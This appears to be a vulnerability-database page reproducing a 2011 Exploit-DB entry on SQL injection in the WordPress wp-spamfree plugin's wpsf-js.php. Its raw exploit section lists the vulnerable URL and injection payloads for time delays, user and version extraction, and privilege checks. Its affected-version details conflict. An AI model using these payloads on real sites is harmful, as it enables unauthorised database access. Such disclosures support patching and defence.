WordPress wpsf-js plugin, SQL Injection

vendor:

wp-spamfree

by:

cheki

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: wp-spamfree

Affected Version From: 3.2.2001

Affected Version To: 3.2.2001

Patch Exists: YES

Related CWE: None

CPE: a:wordpress:wp-spamfree

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2011

WordPress wpsf-js plugin, SQL Injection

A SQL injection vulnerability exists in the WordPress wpsf-js plugin version 3.2.1. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP GET request to the vulnerable server. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Upgrade to the latest version of the WordPress wpsf-js plugin.

Source

Exploit-DB raw data:

#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]
#Date: 2011-09-25
#Author: [cheki]
#Version:[3.2.1]
#Tested on:[linux]
#Used: ["sqlmap"]
#SQL Injection
http://<target>/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1

#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)

#[http://<taget>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()

#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM
mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)

#Home page: http://hacking.ge/